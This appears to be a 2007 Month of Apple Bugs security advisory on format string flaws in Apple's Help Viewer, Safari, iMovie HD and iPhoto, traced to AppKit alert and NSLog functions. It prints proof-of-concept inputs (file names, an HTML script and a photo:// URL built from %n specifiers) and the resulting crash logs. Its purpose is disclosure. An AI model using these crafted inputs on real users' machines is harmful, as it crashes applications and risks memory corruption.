SecurityvulnsSECURITYVULNS:DOC:15945MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities
Summary
As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us Apple's AppKit framework and a few Apple Developers are all we need.
Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apple Help Viewer, Safari and iMovie to the list. Coincidentally iPhoto will also be making a return visit (ala Jim Jones). Long live Team America, too.
Affected versions
The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)
Proof of concept, exploit or instructions to reproduce
As we have mentioned in past releases, the origins of these problems are related to the following functions from Apple's AppKit framework:
- NSBeginAlertSheet
- NSBeginCriticalAlertSheet
- NSBeginInformationalAlertSheet
- NSGetAlertPanel
- NSGetCriticalAlertPanel
- NSGetInformationalAlertPanel
- NSReleaseAlertPanel
- NSRunAlertPanel
- NSRunCriticalAlertPanel
- NSRunInformationalAlertPanel
- NSLog
Multiple developers of Apple based software including Apple's own developers seem to have a misunderstanding of how to properly use the above functions. "For the shake of lulz alone a montage must ensueβ¦"
Safari, iMovie and Help Viewer:
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log Safari.crash.log iMovie HD.crash.log
Safari:
joe-schmoes-computer:/tmp js$ cat test.html
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>
joe-schmoes-computer:/tmp js$ open test.html
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log
iPhoto:
joe-schmoes-computer:/tmp js$ open 'photo://%25n%25n%25n%25n%25n%25n'
joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/
iPhoto.crash.log
Debugging Montage
iPhoto:
Version: 6.0.5 (6.0.5)
Build Version: 2
Project Name: iPhotoProject
Source Version: 3160000
PID: 874
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x925da956
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x92678e6c +[NSString localizedStringWithFormat:] + 129
6 com.apple.iPhoto 0x0002ae3a 0x1000 + 171578
7 com.apple.iPhoto 0x0031298f 0x1000 + 3217807
Safari:
Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300
PID: 455
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000020
Thread 0 Crashed:
0 libobjc.A.dylib 0x90a55380 objc_msgSend + 16
1 com.apple.AppKit 0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278
2 com.apple.AppKit 0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424
3 com.apple.AppKit 0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168
4 com.apple.AppKit 0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877
5 com.apple.AppKit 0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074
6 com.apple.AppKit 0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$
7 com.apple.AppKit 0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122
8 com.apple.AppKit 0x9335f3bf _NXDoLocalRunAlertSheet + 922
9 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
10 com.apple.Safari 0x0008300f 0x1000 + 532495
Help Viewer:
Version: 3.0.0 (144.1)
Build Version: 20
Project Name: HelpViewer
Source Version: 1440800
PID: 970
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x9335f2e0 _NXDoLocalRunAlertSheet + 699
8 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
9 com.apple.helpui 0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165
10 com.apple.helpui 0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512
iMovie HD:
Version: 6.0.3 (6.0.3)
Build Version: 14
Project Name: iMovieApp
Source Version: 2670200
PID: 1013
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x934ac77a _NXDoLocalRunAlertPanel + 683
8 com.apple.AppKit 0x93588ad6 NSRunCriticalAlertPanel + 69
9 com.apple.iMovie 0x000f3f3e 0x1000 + 995134
10 com.apple.iMovie 0x000f3fcf 0x1000 + 995279
Safari (debug enabled):
defaults write com.apple.Safari IncludeDebugMenu 1
Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300
PID: 1042
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x92605ab9 NSLogv + 85
5 com.apple.Foundation 0x926433a5 NSLog + 27
6 libobjc.A.dylib 0x90a58c56 objc_msgSendv + 54
7 com.apple.Foundation 0x925f443e -[NSInvocation invoke] + 932
8 com.apple.JavaScriptCore 0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047
9 com.apple.JavaScriptCore 0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228
10 com.apple.JavaScriptCore 0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158
Notes
Exploitation conditions
All of these functions have behavior similar to printf(). Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution. Still, certain conditions exist that make it possible under certain circumstances.
Workaround or temporary solution
Seek out Landon Fuller and he shall destroy all that is evil!
All your AlertPanel are belong to us.